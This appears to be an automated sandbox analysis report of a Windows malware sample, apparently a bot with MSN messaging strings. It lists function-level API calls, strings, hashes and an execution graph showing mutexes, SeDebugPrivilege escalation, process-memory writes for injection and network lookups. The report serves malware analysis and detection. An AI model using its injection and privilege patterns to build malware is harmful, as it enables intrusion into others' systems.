                                                                  • API ID: lstrlen$MutexObjectReleaseSingleWait_snprintf_vsnprintfmemset
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 1310428588-4225137719
                                                                  • Opcode ID: c8e364cad72a1cfe65662bed58bd2009942f12596e6331dc7f01f3368bdcab04
                                                                  • Instruction ID: d058a667b0126e203e8ecd1657d365872daaed33363ec6df375fc2d27d5833d5
                                                                  • Opcode Fuzzy Hash: c8e364cad72a1cfe65662bed58bd2009942f12596e6331dc7f01f3368bdcab04
                                                                  • Instruction Fuzzy Hash: 9EF0E237B611287AE6326589AC02EFB768CCB42721F4441A1FD0CFA241E99A4E1012E1
                                                                  Function 00410820 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 38stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • lstrlenA.KERNEL32(00000000,?,?,00402696), ref: 0041084B
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$MutexObjectReleaseSingleWait_snprintf_vsnprintf
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 3682388603-4225137719
                                                                  • Opcode ID: cd2e5ab03e999fd462f644ac95d6ffc23b58fba4058bfc23253456729c482e8e
                                                                  • Instruction ID: b1f1ffa5900155dcc42b295b321ae9a5a6157eb97c0d41748f96ae968a92bafe
                                                                  • Opcode Fuzzy Hash: cd2e5ab03e999fd462f644ac95d6ffc23b58fba4058bfc23253456729c482e8e
                                                                  • Instruction Fuzzy Hash: F1F0A772A9512C3AE6207AA5AC02FFB724CCB06755F5001A7FD08F62C1E9E96A5002ED
                                                                  Function 00370820 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 38stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • lstrlenA.KERNEL32(00000000,?,?,00362696), ref: 0037084B
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367401
                                                                    • Part of subcall function 003673E0: memset.MSVCRT ref: 00367419
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 00367431
                                                                    • Part of subcall function 003673E0: _snprintf.MSVCRT ref: 00367449
                                                                    • Part of subcall function 003673E0: _vsnprintf.MSVCRT ref: 0036746B
                                                                    • Part of subcall function 003673E0: lstrlenA.KERNEL32(?), ref: 0036747A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$MutexObjectReleaseSingleWait_snprintf_vsnprintf
                                                                  • String ID: %s_0x%08X$bmsn$msnmsg
                                                                  • API String ID: 3682388603-4225137719
                                                                  • Opcode ID: 50c8dc742868bd36b3df418fc2a645ad2718d370ec1162129301706c1fbc220b
                                                                  • Instruction ID: 9be6777c1940360c2d067c2859ede6e25b04832183259e982b0e1bda88799d83
                                                                  • Opcode Fuzzy Hash: 50c8dc742868bd36b3df418fc2a645ad2718d370ec1162129301706c1fbc220b
                                                                  • Instruction Fuzzy Hash: 8FF0EC72EB51287AE63276A86C03FFB728CCB02750F448191FC0CFA285E9D95E1012E1
                                                                  Function 0040B990 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040B9AF
                                                                  • EnterCriticalSection.KERNEL32(0044A6C8,?,?,00000000), ref: 0040B9BC
                                                                  • wvsprintfA.USER32(00000000,?,00000000), ref: 0040B9D1
                                                                    • Part of subcall function 00408B30: memset.MSVCRT ref: 00408B6E
                                                                  • LeaveCriticalSection.KERNEL32(0044A6C8,?,?,?,?,?,00000000), ref: 0040B9F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterLeavewvsprintf
                                                                  • String ID:
                                                                  • API String ID: 2410102678-0
                                                                  • Opcode ID: adfb22f81eb13afe8c56991aec3e6c19a43ebdbc02006d3e3b819ebf562d807f
                                                                  • Instruction ID: ab1e4383a872c048331199a66424550a9576d0d37af5aa461a589b4671dfd121
                                                                  • Opcode Fuzzy Hash: adfb22f81eb13afe8c56991aec3e6c19a43ebdbc02006d3e3b819ebf562d807f
                                                                  • Instruction Fuzzy Hash: 01F0F6B59402086BD710AB54DC0AFEA772CAF08708F0481AAFF0CA2240E6746A058BA9
                                                                  Function 0036B990 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036B9AF
                                                                  • EnterCriticalSection.KERNEL32(003AA6C8,?,?,00000000), ref: 0036B9BC
                                                                  • wvsprintfA.USER32(00000000,?,00000000), ref: 0036B9D1
                                                                    • Part of subcall function 00368B30: memset.MSVCRT ref: 00368B6E
                                                                  • LeaveCriticalSection.KERNEL32(003AA6C8,?,?,?,?,?,00000000), ref: 0036B9F2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemset$EnterLeavewvsprintf
                                                                  • String ID:
                                                                  • API String ID: 2410102678-0
                                                                  • Opcode ID: c4e45a872cf3132073c9e99723fef539652ef6c61bddbbf843dd478c454f2820
                                                                  • Instruction ID: 37c3add5eed76f87139f87282d033003d6633406f2f5a513f07f307390463773
                                                                  • Opcode Fuzzy Hash: c4e45a872cf3132073c9e99723fef539652ef6c61bddbbf843dd478c454f2820
                                                                  • Instruction Fuzzy Hash: 2DF0F6B69002086BC721AB64DC4AFFA372CEF04704F044194FF0DA6240E6706A458FA5
                                                                  Function 0040E990 Relevance: 6.0, APIs: 4, Instructions: 31sleepsynchronizationthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000DD20,00000000,00000000,00000000), ref: 0040E9BF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040E9C6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E9C9
                                                                  • Sleep.KERNEL32(0000EA60), ref: 0040E9D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleObjectSingleSleepThreadWait
                                                                  • String ID:
                                                                  • API String ID: 422747524-0
                                                                  • Opcode ID: 3520d3d245d61c6a96fe7d34961e73b05a6290d1859ec47a15f0ff463571a8f1
                                                                  • Instruction ID: 6016fdcd02b56c02497e5fa25d12d1976c48136526c7fd933aa435f2e59fedad
                                                                  • Opcode Fuzzy Hash: 3520d3d245d61c6a96fe7d34961e73b05a6290d1859ec47a15f0ff463571a8f1
                                                                  • Instruction Fuzzy Hash: 04F0E531641211BBE3205749AC46FDB7358EB49721F218432F300AA2F0C2B469808AAD
                                                                  Function 0036E990 Relevance: 6.0, APIs: 4, Instructions: 31sleepsynchronizationthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000DD20,00000000,00000000,00000000), ref: 0036E9BF
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036E9C6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036E9C9
                                                                  • Sleep.KERNEL32(0000EA60), ref: 0036E9D4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleObjectSingleSleepThreadWait
                                                                  • String ID:
                                                                  • API String ID: 422747524-0
                                                                  • Opcode ID: e19aaaf8b644e71bdc4bbab819c0185e6ac161888ef45ad5f894da7c32c838d6
                                                                  • Instruction ID: 58cde8b602cc0f36c31b699d5f84a15e2474dd6a37d6793f1bed44b2c1784177
                                                                  • Opcode Fuzzy Hash: e19aaaf8b644e71bdc4bbab819c0185e6ac161888ef45ad5f894da7c32c838d6
                                                                  • Instruction Fuzzy Hash: 01F0E532340200BBE332574D9C47F9A73ACEF46721F204012F308AA2E093B429C086AA
                                                                  Function 0040BA00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040BA1E
                                                                  • wvsprintfA.USER32(00000000,00000000,00000000), ref: 0040BA42
                                                                    • Part of subcall function 0040B990: memset.MSVCRT ref: 0040B9AF
                                                                    • Part of subcall function 0040B990: EnterCriticalSection.KERNEL32(0044A6C8,?,?,00000000), ref: 0040B9BC
                                                                    • Part of subcall function 0040B990: wvsprintfA.USER32(00000000,?,00000000), ref: 0040B9D1
                                                                    • Part of subcall function 0040B990: LeaveCriticalSection.KERNEL32(0044A6C8,?,?,?,?,?,00000000), ref: 0040B9F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemsetwvsprintf$EnterLeave
                                                                  • String ID: PPPPMSG %s :%s
                                                                  • API String ID: 3980427996-569775469
                                                                  • Opcode ID: 703263f5a74a90de65f63654b87d016561f28cc2c25a020cc27163b67a065904
                                                                  • Instruction ID: 5b1b2f56d9f05309dbd408ca821aabdc91fdf399698cc66cc28d17444b118fdb
                                                                  • Opcode Fuzzy Hash: 703263f5a74a90de65f63654b87d016561f28cc2c25a020cc27163b67a065904
                                                                  • Instruction Fuzzy Hash: 6AF096B5900209ABDB10EB54DC45FE67378FB44704F0081AAB90857281FB74AA488FD9
                                                                  Function 0036BA00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036BA1E
                                                                  • wvsprintfA.USER32(00000000,00000000,00000000), ref: 0036BA42
                                                                    • Part of subcall function 0036B990: memset.MSVCRT ref: 0036B9AF
                                                                    • Part of subcall function 0036B990: EnterCriticalSection.KERNEL32(003AA6C8,?,?,00000000), ref: 0036B9BC
                                                                    • Part of subcall function 0036B990: wvsprintfA.USER32(00000000,?,00000000), ref: 0036B9D1
                                                                    • Part of subcall function 0036B990: LeaveCriticalSection.KERNEL32(003AA6C8,?,?,?,?,?,00000000), ref: 0036B9F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmemsetwvsprintf$EnterLeave
                                                                  • String ID: PPPPMSG %s :%s
                                                                  • API String ID: 3980427996-569775469
                                                                  • Opcode ID: 576a1b6b1eb05e07d1258a3968d4cd3cdc05e6628b22d3f853ea39cd537623b4
                                                                  • Instruction ID: ef96653c0a5acf0bd10ec38d7d4173b7e757c294ddd5352cf5c728dd8f421e26
                                                                  • Opcode Fuzzy Hash: 576a1b6b1eb05e07d1258a3968d4cd3cdc05e6628b22d3f853ea39cd537623b4
                                                                  • Instruction Fuzzy Hash: F7F096B5D00109ABDB25EB54DC45FA6737CFB44700F0481A5F90C97141FB74AA58CFA1
                                                                  Function 00409300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: gethostbynameinet_addr
                                                                  • String ID: n"@
                                                                  • API String ID: 1594361348-1818638472
                                                                  • Opcode ID: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction ID: ae33d40cb3c9f804d6ae86217e78cba11e3a34fd54cb6a107b73e1e2973193cc
                                                                  • Opcode Fuzzy Hash: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction Fuzzy Hash: 7DD05B316006145BC910A66AE4418DA739CDE4E3787044157FE1CD77E3C775AC8046D9
                                                                  Function 00369300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: gethostbynameinet_addr
                                                                  • String ID: n"6
                                                                  • API String ID: 1594361348-3573607553
                                                                  • Opcode ID: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction ID: e8c26bcdf85450cc084ac2633105e1a7ec7037625707314cc3f2bf934bc786bf
                                                                  • Opcode Fuzzy Hash: 0dc712adc4df25350ee7766ec22a98ef040dde3b90c5f692ddb856f0b3388dda
                                                                  • Instruction Fuzzy Hash: 74D05B356009149B4911A669E4409D9739CDE4A3747158157FA1CCF7A2C735AC4056D5
                                                                  Function 003668B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,003A9E78,00000026,00000001), ref: 003668BB
                                                                  • PathAppendW.SHLWAPI(003A9E78,Internet Explorer\iexplore.exe), ref: 003668D0
                                                                  Strings
                                                                  • Internet Explorer\iexplore.exe, xrefs: 003668C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendFolderSpecial
                                                                  • String ID: Internet Explorer\iexplore.exe
                                                                  • API String ID: 2921508639-3330628412
                                                                  • Opcode ID: 3ea1eb32441de1f6822909183518b3694f0847cfda58279a30d710a2fcd06206
                                                                  • Instruction ID: e58eba9f132c0b64d11af64085038cf2e9ac7c35f62447fce830dc547dc89bac
                                                                  • Opcode Fuzzy Hash: 3ea1eb32441de1f6822909183518b3694f0847cfda58279a30d710a2fcd06206
                                                                  • Instruction Fuzzy Hash: B8C0122A3C038026EB335B284C8BFD13295E76BF82F808511F50AFD0D2C7D544805202

                                                                  Execution Graph

                                                                  Execution Coverage:3.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:203
                                                                  Total number of Limit Nodes:12
                                                                  execution_graph 5140 3d5c50 5146 3d5a20 5140->5146 5142 3d5cd8 5143 3d5c67 5143->5142 5160 3d49f0 5143->5160 5145 3d5cc6 5147 3d5a2b 5146->5147 5148 3d5c46 5147->5148 5178 3d3a20 5147->5178 5148->5143 5150 3d5a3c 5150->5148 5183 3d4d00 5150->5183 5152 3d5aef 5206 3d3080 5152->5206 5154 3d5b31 5155 3d3080 5 API calls 5154->5155 5158 3d5b4f 5155->5158 5156 3d5bf4 CreateThread CloseHandle 5157 3d5c0c 5156->5157 5157->5148 5159 3d5c2e CreateThread CloseHandle 5157->5159 5158->5156 5158->5157 5159->5148 5161 3d4acb 5160->5161 5162 3d4a00 5160->5162 5161->5145 5162->5161 5163 3d4a0b WaitForSingleObject 5162->5163 5163->5161 5164 3d4a1e 5163->5164 5165 3d4560 8 API calls 5164->5165 5167 3d4a42 5165->5167 5166 3d4a79 5166->5145 5167->5166 5169 3d4aad ReleaseMutex 5167->5169 5347 3d47c0 5167->5347 5171 3d4470 4 API calls 5169->5171 5173 3d4ac6 5171->5173 5172 3d4a6d 5174 3d4a74 ReleaseMutex 5172->5174 5175 3d4a80 5172->5175 5173->5145 5174->5166 5176 3d4470 4 API calls 5175->5176 5177 3d4a88 ReleaseMutex 5176->5177 5177->5169 5180 3d3a25 5178->5180 5179 3d3a2d 5179->5150 5180->5179 5212 3d35b0 GetPEB 5180->5212 5182 3d3a44 5182->5150 5185 3d4d0e 5183->5185 5184 3d4d16 5184->5152 5185->5184 5186 3d3a20 GetPEB 5185->5186 5187 3d4d33 5186->5187 5188 3d4d3d GetVersionExA 5187->5188 5189 3d4d37 5187->5189 5188->5189 5190 3d4d56 5188->5190 5189->5152 5213 3d3f90 5190->5213 5192 3d4d5c 5219 3d3390 5192->5219 5194 3d4d7e 5228 3d4ae0 5194->5228 5196 3d4d9b 5252 3d3ac0 5196->5252 5198 3d4da6 strncpy 5199 3d4dd0 5198->5199 5200 3d4dee 5199->5200 5270 3d3440 5199->5270 5256 3d3890 5200->5256 5203 3d4e67 5261 3d4c20 5203->5261 5205 3d4e7e 5205->5152 5207 3d3890 GetPEB 5206->5207 5209 3d308c 5207->5209 5208 3d30bb 5208->5154 5209->5208 5336 3d2f90 5209->5336 5211 3d30b6 5211->5154 5212->5182 5214 3d3f9f 5213->5214 5216 3d3fa6 5213->5216 5215 3d3890 GetPEB 5214->5215 5215->5216 5217 3d3890 GetPEB 5216->5217 5218 3d3fd1 5216->5218 5217->5218 5218->5192 5220 3d339b 5219->5220 5221 3d33a0 5219->5221 5220->5194 5287 3d30c0 5221->5287 5224 3d30c0 InitializeCriticalSection 5226 3d33c3 5224->5226 5225 3d342e 5225->5194 5226->5225 5291 3d31d0 5226->5291 5229 3d4b54 5228->5229 5230 3d4af2 5228->5230 5229->5196 5230->5229 5231 3d4b0d strncpy sprintf CreateMutexA 5230->5231 5232 3d4b5c _snprintf OpenFileMappingA 5231->5232 5233 3d4b4b 5231->5233 5234 3d4b9d 5232->5234 5235 3d4b96 CloseHandle 5232->5235 5304 3d4880 5233->5304 5237 3d4bb4 5234->5237 5238 3d4ba1 5234->5238 5235->5234 5298 3d4470 5237->5298 5313 3d4560 5238->5313 5239 3d4b51 5239->5229 5242 3d4bad 5242->5237 5244 3d4bd1 5242->5244 5243 3d4bbc 5245 3d4bc8 5243->5245 5246 3d4bda 5243->5246 5244->5196 5247 3d4880 3 API calls 5245->5247 5248 3d4bde WaitForSingleObject 5246->5248 5249 3d4c08 5246->5249 5250 3d4bce 5247->5250 5248->5249 5251 3d4bed ReleaseMutex 5248->5251 5249->5196 5250->5244 5251->5249 5253 3d3acc 5252->5253 5254 3d3b10 5252->5254 5253->5254 5255 3d3ae0 _snprintf 5253->5255 5254->5198 5255->5198 5257 3d38a0 5256->5257 5260 3d38ae 5256->5260 5321 3d35b0 GetPEB 5257->5321 5259 3d38a5 5259->5203 5260->5203 5322 3d35d0 5261->5322 5263 3d4c31 OpenProcessToken 5264 3d4c3c GetLastError 5263->5264 5265 3d4c48 LookupPrivilegeValueA 5263->5265 5264->5205 5266 3d4c5c GetLastError CloseHandle 5265->5266 5267 3d4c72 AdjustTokenPrivileges 5265->5267 5266->5205 5268 3d4ca9 CloseHandle 5267->5268 5269 3d4ca3 GetLastError 5267->5269 5268->5205 5269->5268 5271 3d359f 5270->5271 5274 3d3451 5270->5274 5271->5200 5272 3d348c printf printf 5276 3d34c7 printf 5272->5276 5277 3d34c2 5272->5277 5274->5271 5274->5272 5275 3d355a 5274->5275 5281 3d3593 5275->5281 5330 3d3320 5275->5330 5282 3d34f1 5276->5282 5277->5276 5280 3d31d0 2 API calls 5280->5281 5281->5200 5282->5271 5323 3d3100 5282->5323 5284 3d354a 5285 3d3440 6 API calls 5284->5285 5286 3d3551 5285->5286 5286->5200 5288 3d30cb 5287->5288 5289 3d30f1 5287->5289 5288->5289 5290 3d30e7 InitializeCriticalSection 5288->5290 5289->5224 5290->5289 5292 3d31dc 5291->5292 5293 3d3230 5291->5293 5292->5293 5294 3d31e9 EnterCriticalSection 5292->5294 5295 3d31f3 5292->5295 5293->5225 5294->5295 5296 3d321d LeaveCriticalSection 5295->5296 5297 3d3227 5295->5297 5296->5297 5297->5225 5299 3d448e _snprintf OpenFileMappingA 5298->5299 5300 3d4536 5298->5300 5301 3d4530 5299->5301 5302 3d44e2 MapViewOfFile 5299->5302 5300->5243 5301->5243 5302->5300 5303 3d4516 CloseHandle 5302->5303 5303->5301 5305 3d488b 5304->5305 5306 3d4890 5304->5306 5305->5239 5307 3d4897 CloseHandle 5306->5307 5308 3d48a4 5306->5308 5307->5308 5309 3d48b7 UnmapViewOfFile 5308->5309 5310 3d48cc 5308->5310 5309->5308 5311 3d48da CloseHandle 5310->5311 5312 3d48ef 5310->5312 5311->5310 5312->5239 5320 3d457a 5313->5320 5314 3d4470 4 API calls 5314->5320 5315 3d46fd 5315->5242 5316 3d45b9 _snprintf 5317 3d45ed CreateFileMappingA 5316->5317 5316->5320 5317->5315 5318 3d4621 MapViewOfFile 5317->5318 5319 3d4706 CloseHandle 5318->5319 5318->5320 5319->5242 5320->5314 5320->5315 5320->5316 5320->5317 5321->5259 5322->5263 5324 3d310c 5323->5324 5325 3d3161 5323->5325 5324->5325 5326 3d3119 EnterCriticalSection 5324->5326 5327 3d3123 5324->5327 5325->5284 5326->5327 5328 3d314e LeaveCriticalSection 5327->5328 5329 3d3158 5327->5329 5328->5329 5329->5284 5331 3d3385 5330->5331 5332 3d3332 5330->5332 5331->5280 5332->5331 5333 3d333c EnterCriticalSection 5332->5333 5334 3d3346 5332->5334 5333->5334 5334->5331 5335 3d337b LeaveCriticalSection 5334->5335 5335->5331 5337 3d3074 5336->5337 5338 3d2fa2 5336->5338 5337->5211 5338->5337 5339 3d2fc2 ReadProcessMemory 5338->5339 5340 3d2fe0 5339->5340 5346 3d3059 5339->5346 5341 3d3004 WriteProcessMemory 5340->5341 5340->5346 5342 3d3022 5341->5342 5341->5346 5343 3d3028 WriteProcessMemory 5342->5343 5342->5346 5344 3d303c 5343->5344 5343->5346 5345 3d3044 WriteProcessMemory 5344->5345 5344->5346 5345->5346 5346->5211 5348 3d4875 5347->5348 5349 3d47d1 5347->5349 5348->5172 5349->5348 5350 3d47ed InterlockedIncrement 5349->5350 5354 3d4807 5350->5354 5351 3d4470 _snprintf OpenFileMappingA MapViewOfFile CloseHandle 5351->5354 5352 3d4560 8 API calls 5352->5354 5353 3d485c 5353->5172 5354->5351 5354->5352 5354->5353 5355 3d5040 5356 3d504c 5355->5356 5357 3d5060 5355->5357 5356->5357 5359 3d4e90 5356->5359 5360 3d5031 5359->5360 5361 3d4ea2 5359->5361 5360->5357 5361->5360 5364 3d4fa8 5361->5364 5365 3d3440 9 API calls 5361->5365 5366 3d2f90 4 API calls 5361->5366 5363 3d5022 5363->5357 5367 3d6080 5364->5367 5365->5361 5366->5361 5368 3d610a 5367->5368 5369 3d608e 5367->5369 5368->5363 5369->5368 5370 3d3440 9 API calls 5369->5370 5371 3d60f6 5369->5371 5372 3d6103 5369->5372 5370->5369 5371->5363 5372->5363

                                                                  Executed Functions

                                                                  Function 003D4C20 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,003D4E7E,SeDebugPrivilege,00000001,00000000,ntdll.dll,NtGetNextProcess), ref: 003D4C32
                                                                  • GetLastError.KERNEL32 ref: 003D4C3C
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 003D4C52
                                                                  • GetLastError.KERNEL32 ref: 003D4C5C
                                                                  • CloseHandle.KERNEL32(?), ref: 003D4C66
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CloseHandleLookupOpenPrivilegeProcessTokenValue
                                                                  • String ID:
                                                                  • API String ID: 1673749002-0
                                                                  • Opcode ID: 9eae95835072d7f88a973244ad74375d99e648a385a53da4b5d2c2604a7e9c3a
                                                                  • Instruction ID: 3b92875d432688f47ec62d7f8fad052c78aede0cf35a3a6f2f8b3886cd71c0a9
                                                                  • Opcode Fuzzy Hash: 9eae95835072d7f88a973244ad74375d99e648a385a53da4b5d2c2604a7e9c3a
                                                                  • Instruction Fuzzy Hash: 4C117375A10208ABDB21DBE4ED49FAEB7BCEB49701F404649FE09DB280DA719D048761
                                                                  Function 003D4AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 111synchronizationstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • strncpy.MSVCRT(EDB88F28,00010000,00000104,EDB88320,00000000,00000D10,?,00000000), ref: 003D4B1A
                                                                  • sprintf.MSVCRT(?,-%sMutex,00010000,EDB88F28,00010000,00000104,EDB88320,00000000,00000D10,?,00000000), ref: 003D4B2C
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B3F
                                                                  • _snprintf.MSVCRT(?,00000104,%s_0,00010000,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B6F
                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B85
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4B97
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4BE3
                                                                  • ReleaseMutex.KERNEL32(?,?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003D4C02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Mutex$CloseCreateFileHandleMappingObjectOpenReleaseSingleWait_snprintfsprintfstrncpy
                                                                  • String ID: %s_0$-%sMutex
                                                                  • API String ID: 4144850300-892854768
                                                                  • Opcode ID: 7a3f03325285fb515feacb0eba1ab88f250f10124d92d6b500174a37f108be26
                                                                  • Instruction ID: ccfb524271fa29ec5516bde7ed3b646fafc8fa890704194df9f7af6f11b4a965
                                                                  • Opcode Fuzzy Hash: 7a3f03325285fb515feacb0eba1ab88f250f10124d92d6b500174a37f108be26
                                                                  • Instruction Fuzzy Hash: 0D312CB26002446BD721DF65FC81FDA77AC9F54710F04465BFD899B280EBB1D9848690
                                                                  Function 003D5A20 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 189threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
